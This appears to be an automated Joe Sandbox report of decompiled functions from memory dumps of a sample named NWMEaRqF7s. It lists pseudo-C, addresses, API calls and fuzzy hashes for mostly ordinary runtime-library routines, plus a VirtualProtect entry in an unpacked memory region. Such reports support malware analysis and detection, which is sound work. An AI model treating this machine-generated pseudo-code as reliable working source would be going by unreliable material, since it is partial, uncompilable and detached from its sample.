Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: _memmove_s
String ID: ~hW
API String ID: 800865076-4279806109
Opcode ID: 931fb6340859c89c402a8088c38bd7c54ab9a0b71192c09071587e71d5b65f94
Instruction ID: 102a0ea3eca27aeed369f946151bd1db1440c8230f948bad12f4f6323d19a1f9
Opcode Fuzzy Hash: 931fb6340859c89c402a8088c38bd7c54ab9a0b71192c09071587e71d5b65f94
Instruction Fuzzy Hash: 7B41E578A01108EFCB04DF99D58499EB7B2FF88310F20C15AE919AB395C735AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0041C01D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0041C01D(void* __ecx) {
				signed short* _t33;
				void* _t35;
				void* _t40;
				void* _t43;
				signed short _t46;
				intOrPtr _t47;
				void* _t48;
				signed short _t50;
				signed int _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t55;

				_t48 = __ecx;
				_t54 =  *((intOrPtr*)(_t55 + 0x14));
				_t53 = 0;
				if( *((intOrPtr*)(_t54 + 8)) > 0) {
					_t47 =  *((intOrPtr*)(_t55 - 0x1c));
					do {
						__imp__#9(_t47);
						_t53 = _t53 + 1;
						_t47 = _t47 + 0x10;
					} while (_t53 <  *((intOrPtr*)(_t54 + 8)));
				}
				E0041F7F4(0, 0);
				E0041B9A1(_t48);
				_t33 =  *(_t55 + 0x10);
				if(_t33 == 0) {
					_t35 = ( *(_t55 - 0x24) & 0x0000ffff) - 8;
					if(_t35 == 0) {
						__imp__#6(_t46);
					} else {
						_t40 = _t35 - 1;
						if(_t40 == 0) {
							L19:
							if(_t46 != 0) {
								 *((intOrPtr*)( *_t46 + 8))(_t46);
							}
						} else {
							_t43 = _t40 - 3;
							if(_t43 == 0) {
								__imp__#9(_t55 - 0x44);
							} else {
								if(_t43 == 1) {
									goto L19;
								}
							}
						}
					}
				} else {
					_t50 =  *(_t55 - 0x24);
					 *_t33 = _t50;
					_t52 = (_t50 & 0x0000ffff) + 0xfffffffe;
					if(_t52 <= 0x13) {
						switch( *((intOrPtr*)(_t52 * 4 +  &M0041C107))) {
							case 0:
								L12:
								 *(__eax + 8) = __bx;
								goto L23;
							case 1:
								 *(__eax + 8) = __ebx;
								goto L23;
							case 2:
								 *(__eax + 8) =  *(__ebp - 0x44);
								goto L23;
							case 3:
								 *(__eax + 8) =  *(__ebp - 0x44);
								goto L23;
							case 4:
								__ecx =  *(__ebp - 0x44);
								 *(__eax + 8) =  *(__ebp - 0x44);
								__ecx =  *(__ebp - 0x40);
								 *(__eax + 0xc) = __ecx;
								goto L23;
							case 5:
								__bx =  ~__bx;
								asm("sbb ebx, ebx");
								goto L12;
							case 6:
								__esi = __ebp - 0x44;
								__edi = __eax;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								goto L23;
							case 7:
								goto L23;
							case 8:
								_t33[4] = _t46;
								goto L23;
						}
					}
				}
				L23:
				 *(_t55 - 4) = 0;
				E0041B9F7(_t55 - 0x58);
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t55 - 0x2c)) != 0) {
					_push( *((intOrPtr*)(_t55 - 0x30)));
					_push(0);
					E0040D3B7();
				}
				return E0041F7E5(_t46, _t53, _t54);
			}

0x0041c01d
0x0041c01d
0x0041c020
0x0041c025
0x0041c027
0x0041c02a
0x0041c02b
0x0041c031
0x0041c032
0x0041c035
0x0041c02a
0x0041c03e
0x0041c043
0x0041c048
0x0041c04d
0x0041c0a9
0x0041c0ac
0x0041c0d2
0x0041c0ae
0x0041c0ae
0x0041c0af
0x0041c0b9
0x0041c0bb
0x0041c0c0
0x0041c0c0
0x0041c0b1
0x0041c0b1
0x0041c0b4
0x0041c0c9
0x0041c0b6
0x0041c0b7
0x00000000
0x00000000
0x0041c0b7
0x0041c0b4
0x0041c0af
0x0041c04f
0x0041c04f
0x0041c052
0x0041c058
0x0041c05e
0x0041c060
0x00000000
0x0041c08f
0x0041c08f
0x00000000
0x00000000
0x0041c0a0
0x00000000
0x00000000
0x0041c07d
0x00000000
0x00000000
0x0041c085
0x00000000
0x00000000
0x0041c06c
0x0041c06f
0x0041c072
0x0041c075
0x00000000
0x00000000
0x0041c08a
0x0041c08d
0x00000000
0x00000000
0x0041c095
0x0041c098
0x0041c09a
0x0041c09b
0x0041c09c
0x0041c09d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c067
0x00000000
0x00000000
0x0041c060
0x0041c05e
0x0041c0d8
0x0041c0db
0x0041c0df
0x0041c0e4
0x0041c0ec
0x0041c0ee
0x0041c0f1
0x0041c0f3
0x0041c0f3
0x0041c102

APIs

VariantClear.OLEAUT32(?), ref: 0041C02B
__CxxThrowException@8.LIBCMT ref: 0041C03E

Strings

XpC, xrefs: 0041C0D8

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: ClearException@8ThrowVariant
String ID: XpC
API String ID: 3645285410-1560596422
Opcode ID: c6d49d499b5d8eaa98cd637276b1d5e44ea3e0b00cd18839773f064d833eb071
Instruction ID: d9f4d4b0c6ef5e2124660a129b9ddfcdd11f384d2037844c7c04da0540221948
Opcode Fuzzy Hash: c6d49d499b5d8eaa98cd637276b1d5e44ea3e0b00cd18839773f064d833eb071
Instruction Fuzzy Hash: 08218E30984208CFCB10DFE5CCC46EDBBB1FF49310F25815AD55A272A1C7396A8ADB5A

Uniqueness

Uniqueness Score: -1.00%

Function 02242430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 02242468
VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 022424B2

Strings

@, xrefs: 02242453

Memory Dump Source

Source File: 00000001.00000002.347463465.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2241000_NWMEaRqF7s.jbxd

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 5513344821bccb8160ac3e9adfcad24b54b83ce4cda6f70f3991fed36bdac42e
Instruction ID: 323fd1d6d7f24f045f515478f8f25cfdcc0ea00a18e8c4a415f11994b32d87bb
Opcode Fuzzy Hash: 5513344821bccb8160ac3e9adfcad24b54b83ce4cda6f70f3991fed36bdac42e
Instruction Fuzzy Hash: 3221D8B4E10209EFDB18CFD5C984BAEBBB5FF44304F608699E905AB244CB74AA40DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00404429, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00404429(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x443590; // 0xa920217c
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E00403EBB(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E00404142(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E0041E5DF(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

0x00404432
0x00404439
0x0040443f
0x0040444f
0x00404457
0x004044ae
0x004044ae
0x004044ae
0x0040445d
0x00404465
0x0040446b
0x00404473
0x00404474
0x00404478
0x00404483
0x00404489
0x0040448a
0x0040448b
0x00000000
0x0040448d
0x00404498
0x004044a7
0x004044a7
0x0040448b
0x004044bc

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0040444F
PathFindExtensionA.SHLWAPI(?), ref: 00404465

Part of subcall function 00403EBB: _strcpy_s.LIBCMT ref: 00403EC7

Part of subcall function 00404142: __EH_prolog3.LIBCMT ref: 00404161
Part of subcall function 00404142: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 00404182
Part of subcall function 00404142: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00404193
Part of subcall function 00404142: ConvertDefaultLocale.KERNELBASE(?), ref: 004041C9
Part of subcall function 00404142: ConvertDefaultLocale.KERNELBASE(?), ref: 004041D1
Part of subcall function 00404142: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 004041E5
Part of subcall function 00404142: ConvertDefaultLocale.KERNEL32(?), ref: 00404209
Part of subcall function 00404142: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0040420F
Part of subcall function 00404142: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00404248

Strings

%s.dll, xrefs: 0040446B

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
Opcode ID: 8e7e12c1d50eaefc46e865cbfd3ee717ae355514b69d53891cd43f448e5456b4
Instruction ID: 19a3236b257a23e403f0296e6cb30a89f0e944724a7da86974bbd27a45870086
Opcode Fuzzy Hash: 8e7e12c1d50eaefc46e865cbfd3ee717ae355514b69d53891cd43f448e5456b4
Instruction Fuzzy Hash: B50179B19001186FCB19DF64DD56AEF77B9EF44704F4101BABA06F3180EA789F448AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A311, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041A311(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t29;
				void* _t47;
				void* _t51;
				void* _t53;
				void* _t54;

				_t54 = __eflags;
				_t47 = __edx;
				_push(0xc);
				E0041F6EA(E00433470, __ebx, __edi, __esi);
				_t51 = E0040DB94(__ebx, __edi, __esi, _t54);
				E0040FA7F(__ebx, _t51, _t53, 1);
				_t2 = _t51 + 0x34; // 0x34
				_t49 = _t2;
				 *((intOrPtr*)(_t53 - 0x14)) = 0;
				E0040FF4A(_t2, _t53 - 0x10, 0x436e68, _t53 - 0x14);
				 *((intOrPtr*)(_t53 - 4)) = 0;
				while( *((intOrPtr*)( *(_t53 - 0x10) - 0xc)) != 0) {
					UnregisterClassA( *(_t53 - 0x10),  *(E0040DB94(0, _t49, 0x436e68, __eflags) + 8));
					_t29 = E0040FF4A(_t49, _t53 - 0x18, 0x436e68, _t53 - 0x14);
					 *((char*)(_t53 - 4)) = 1;
					E004071CF(_t53 - 0x10, _t53, _t29);
					__eflags =  *((intOrPtr*)(_t53 - 0x18)) + 0xfffffff0;
					 *((char*)(_t53 - 4)) = 0;
					E00403036( *((intOrPtr*)(_t53 - 0x18)) + 0xfffffff0, _t47);
				}
				E00402C20(_t49);
				E0040FAEC(1);
				return E0041F7C2(E00403036( &(( *(_t53 - 0x10))[0xfffffffffffffff0]), _t47));
			}

0x0041a311
0x0041a311
0x0041a311
0x0041a318
0x0041a324
0x0041a326
0x0041a32f
0x0041a32f
0x0041a340
0x0041a343
0x0041a348
0x0041a389
0x0041a358
0x0041a369
0x0041a372
0x0041a376
0x0041a37e
0x0041a381
0x0041a384
0x0041a384
0x0041a393
0x0041a39a
0x0041a3af

APIs

__EH_prolog3.LIBCMT ref: 0041A318

Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FABB
Part of subcall function 0040FA7F: InitializeCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FACA
Part of subcall function 0040FA7F: LeaveCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAD7
Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAE3

UnregisterClassA.USER32 ref: 0041A358

Strings

hnC, xrefs: 0041A332

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CriticalSection$Enter$ClassH_prolog3InitializeLeaveUnregister
String ID: hnC
API String ID: 2524309216-2905478537
Opcode ID: ffcc6aad4f89ebf377f4c376c63438c322617fcf0fa9e5959b7b804a15e635af
Instruction ID: dc9c157aa842fe30cd6fe9b5929375e780ac80eaa54db6f8b7d68f330885adc6
Opcode Fuzzy Hash: ffcc6aad4f89ebf377f4c376c63438c322617fcf0fa9e5959b7b804a15e635af
Instruction Fuzzy Hash: 7611737190110A9FCB10EBE5C851AEEB779AF44308F00057FB112B72D2CA3C6A49CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402F17, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E00402F17(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v16;
				char _v24;
				intOrPtr _v36;
				intOrPtr _t10;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t28;
				void* _t30;

				_t26 = __esi;
				_t25 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_t10 = _a4;
				if(_t10 == 0) {
					L7:
					return _t10;
				} else {
					if(_t10 == 0xc) {
						_push(_t27);
						_t28 = _t30;
						_push(__ecx);
						_v8 = 0x442350;
						E0041F7F4( &_v8, 0x43c4ec);
						asm("int3");
						_push(_t28);
						_t27 = _t30;
						_push(_t23);
						_t4 =  &_v16; // 0x442350
						_v16 = 0x4423e8;
						E0041F7F4(_t4, 0x43c54c);
						asm("int3");
						goto L10;
					} else {
						if(_t10 == 0x16 || _t10 == 0x22 || _t10 != 0x50) {
							L10:
							_push(_t27);
							_push(_t23);
							_t6 =  &_v24; // 0x4423e8
							_v24 = 0x442480;
							E0041F7F4(_t6, 0x43c590);
							asm("int3");
							_push(4);
							E0041F6EA(E00431BFC, _t22, _t25, _t26);
							_t24 = E0040F014(0x104);
							_v36 = _t24;
							_t20 = 0;
							_v24 = 0;
							if(_t24 != 0) {
								_t20 = E0040D519(_t24);
							}
							return E0041F7C2(_t20);
						} else {
							goto L7;
						}
					}
				}
			}

0x00402f17
0x00402f17
0x00402f17
0x00402f17
0x00402f17
0x00402f1d
0x00402f3d
0x00402f3d
0x00402f1f
0x00402f22
0x004037af
0x004037b0
0x004037b2
0x004037bc
0x004037c3
0x004037c8
0x004037c9
0x004037ca
0x004037cc
0x004037d2
0x004037d6
0x004037dd
0x004037e2
0x00000000
0x00402f24
0x00402f27
0x004037e3
0x004037e3
0x004037e6
0x004037ec
0x004037f0
0x004037f7
0x004037fc
0x004037fd
0x00403804
0x00403813
0x00403815
0x00403818
0x0040381c
0x0040381f
0x00403821
0x00403821
0x0040382b
0x00000000
0x00000000
0x00000000
0x00402f27
0x00402f22

APIs

__CxxThrowException@8.LIBCMT ref: 004037F7
__EH_prolog3.LIBCMT ref: 00403804

Strings

#D, xrefs: 004037EC, 004037EF

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Exception@8H_prolog3Throw
String ID: #D
API String ID: 3670251406-724133492
Opcode ID: 85853aadfd074157ec7116a43067f9815513aa3ef37de8bdfc9c1c2a10bf49d8
Instruction ID: b0f2db476828d076c5aa5a1c3ccda07ec6cbf835b824b1e618174a28debf0169
Opcode Fuzzy Hash: 85853aadfd074157ec7116a43067f9815513aa3ef37de8bdfc9c1c2a10bf49d8
Instruction Fuzzy Hash: 98F059B4210202ABDF24EBA9455956F21A89B48748F60487BF101F22C1E6BCCA80A62E

Uniqueness

Uniqueness Score: -1.00%

Function 004127B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004127B4(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t35;
				void* _t36;

				_t36 = __eflags;
				_push(4);
				E0041F6EA(E00432BE0, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t35 - 0x10)) = __ecx;
				E004048ED(__ecx, _t36);
				 *((intOrPtr*)(_t35 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x43688c;
				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t35 + 8));
				E00419FBF(__ecx + 0x24, 0xa);
				 *((char*)(_t35 - 4)) = 1;
				E00412091(__ecx + 0x40, 0xa);
				 *(__ecx + 0x5c) =  *(__ecx + 0x5c) | 0xffffffff;
				 *(__ecx + 0x60) =  *(__ecx + 0x60) | 0xffffffff;
				 *((intOrPtr*)(__ecx + 0x64)) = 0;
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(__ecx + 0x6c)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 0x436954;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0x436934;
				return E0041F7C2(__ecx);
			}

0x004127b4
0x004127b4
0x004127bb
0x004127c2
0x004127c5
0x004127d4
0x004127d7
0x004127dd
0x004127e0
0x004127ea
0x004127ee
0x004127f3
0x004127f7
0x004127fb
0x004127fe
0x00412801
0x00412804
0x00412807
0x0041280a
0x00412811
0x0041281f

APIs

__EH_prolog3.LIBCMT ref: 004127BB

Strings

4iC, xrefs: 00412811
TiC, xrefs: 0041280A

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: H_prolog3
String ID: 4iC$TiC
API String ID: 431132790-4008140021
Opcode ID: 25bd1f09a88dfbd6e75494a7b2438433112ff2ef9308b05e2517b23215d19696
Instruction ID: 5d0dc50055799547b18938ce6c7b49451773700af5d5b110cd1056841da70260
Opcode Fuzzy Hash: 25bd1f09a88dfbd6e75494a7b2438433112ff2ef9308b05e2517b23215d19696
Instruction Fuzzy Hash: B301FBB1900B419BD720EF2B850564AFFE0BF58714F108A0FE6E6877A1C7B8A645CF49

Uniqueness

Uniqueness Score: -1.00%

Function 00409BB5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00409BB5(void* __ebx, void* __edi, void* __eflags) {
				char _v16;
				intOrPtr _v28;
				void* __esi;
				unsigned int _t11;
				unsigned int _t12;
				intOrPtr _t20;
				intOrPtr _t25;
				void* _t27;
				void* _t28;

				_push(_t27);
				_push(0x4037fd);
				_t28 = E0040F584(__ebx, 0x44642c, __edi, _t27, __eflags);
				if(_t28 != 0) {
					 *((intOrPtr*)(_t28 + 0x68)) = GetMessageTime();
					_t11 = GetMessagePos();
					_t12 = _t11 >> 0x10;
					__eflags = _t12;
					 *((intOrPtr*)(_t28 + 0x70)) = _t12;
					 *((intOrPtr*)(_t28 + 0x6c)) = _t11;
					_t8 = _t28 + 0x58; // 0x58
					return _t8;
				} else {
					_push(0x44642c);
					_t1 =  &_v16; // 0x4423e8
					_v16 = 0x442480;
					E0041F7F4(_t1, 0x43c590);
					asm("int3");
					_push(4);
					E0041F6EA(E00431BFC, __ebx, __edi, _t28);
					_t25 = E0040F014(0x104);
					_v28 = _t25;
					_t20 = 0;
					_v16 = 0;
					if(_t25 != 0) {
						_t20 = E0040D519(_t25);
					}
					return E0041F7C2(_t20);
				}
			}

0x00409bb5
0x00409bb6
0x00409bc5
0x00409bc9
0x00409bd6
0x00409bd9
0x00409be2
0x00409be2
0x00409be8
0x00409beb
0x00409bee
0x00409bf2
0x00409bcb
0x004037e6
0x004037ec
0x004037f0
0x004037f7
0x004037fc
0x004037fd
0x00403804
0x00403813
0x00403815
0x00403818
0x0040381c
0x0040381f
0x00403821
0x00403821
0x0040382b
0x0040382b

APIs

Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B

GetMessageTime.USER32(004037FD), ref: 00409BD0
GetMessagePos.USER32 ref: 00409BD9

Strings

,dD, xrefs: 00409BBB

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Message$H_prolog3Time
String ID: ,dD
API String ID: 3041656633-3191229884
Opcode ID: 85efacd1186bf4a8b795f4880ecfb808e23b542ecfef8d82670301cc578eca90
Instruction ID: 33c9b5c6f293619a4ac6e8f97073239bc9264db69f185d1a93d85d444b44338a
Opcode Fuzzy Hash: 85efacd1186bf4a8b795f4880ecfb808e23b542ecfef8d82670301cc578eca90
Instruction Fuzzy Hash: 42E046B5800B618BD7219F65A4481AB7AE4EB44366300083FE886E7A50DB38E802CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004037E3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E004037E3(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _v20;
				intOrPtr _t10;
				intOrPtr _t14;

				_push(__ecx);
				_t1 =  &_v8; // 0x4423e8
				_v8 = 0x442480;
				E0041F7F4(_t1, 0x43c590);
				asm("int3");
				_push(4);
				E0041F6EA(E00431BFC, __ebx, __edi, __esi);
				_t14 = E0040F014(0x104);
				_v20 = _t14;
				_t10 = 0;
				_v8 = 0;
				if(_t14 != 0) {
					_t10 = E0040D519(_t14);
				}
				return E0041F7C2(_t10);
			}

0x004037e6
0x004037ec
0x004037f0
0x004037f7
0x004037fc
0x004037fd
0x00403804
0x00403813
0x00403815
0x00403818
0x0040381c
0x0040381f
0x00403821
0x00403821
0x0040382b

APIs

__CxxThrowException@8.LIBCMT ref: 004037F7

Part of subcall function 0041F7F4: RaiseException.KERNEL32(?,?,?,?), ref: 0041F834

__EH_prolog3.LIBCMT ref: 00403804

Part of subcall function 0040F014: LocalAlloc.KERNEL32(00000040,00442480,00403813,00000104,00000004,#D,0043C590,?,?,P#D,0043C54C,?,?,000000FF,0043C4EC), ref: 0040F01A

Strings

#D, xrefs: 004037EC, 004037EF

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: AllocExceptionException@8H_prolog3LocalRaiseThrow
String ID: #D
API String ID: 927841988-724133492
Opcode ID: 8d38915f9f95c0d2ad1004b0652c1badefd5fb6fe002ff9900cc593122a3e41a
Instruction ID: ed78f3ae13bf56099f920655d6bdc6ccae9d51d717f7131c7a3c52a0a811eed1
Opcode Fuzzy Hash: 8d38915f9f95c0d2ad1004b0652c1badefd5fb6fe002ff9900cc593122a3e41a
Instruction Fuzzy Hash: C8D012B5250208BBD600FBD68947ECD715CDB08708F60547BF310A65D2E7F96A89533D

Uniqueness

Uniqueness Score: -1.00%

Function 0041F481, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F481(void* __eax, void* __esi) {
				void* _t13;
				intOrPtr _t16;

				_t1 = _t13 + 5;
				 *_t1 =  *((intOrPtr*)(_t13 + 5)) + __esi;
				_t16 =  *_t1;
			}

0x0041f486
0x0041f486
0x0041f486

APIs

__FF_MSGBANNER.LIBCMT ref: 0041F489

Part of subcall function 0042608D: __NMSG_WRITE.LIBCMT ref: 004260B4
Part of subcall function 0042608D: __NMSG_WRITE.LIBCMT ref: 004260BE

__NMSG_WRITE.LIBCMT ref: 0041F492

Part of subcall function 00425EED: _strcpy_s.LIBCMT ref: 00425F59
Part of subcall function 00425EED: __invoke_watson.LIBCMT ref: 00425F6A
Part of subcall function 00425EED: GetModuleFileNameA.KERNEL32(00000000,00446DC9,00000104,?,00401B31,00009618), ref: 00425F86
Part of subcall function 00425EED: _strcpy_s.LIBCMT ref: 00425F9B
Part of subcall function 00425EED: __invoke_watson.LIBCMT ref: 00425FAE
Part of subcall function 00425EED: _strlen.LIBCMT ref: 00425FB7
Part of subcall function 00425EED: _strlen.LIBCMT ref: 00425FC4
Part of subcall function 00425EED: __invoke_watson.LIBCMT ref: 00425FF1

Part of subcall function 0041F960: ___crtCorExitProcess.LIBCMT ref: 0041F964
Part of subcall function 0041F960: ExitProcess.KERNEL32 ref: 0041F96E

Strings

|hD, xrefs: 0041F481

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

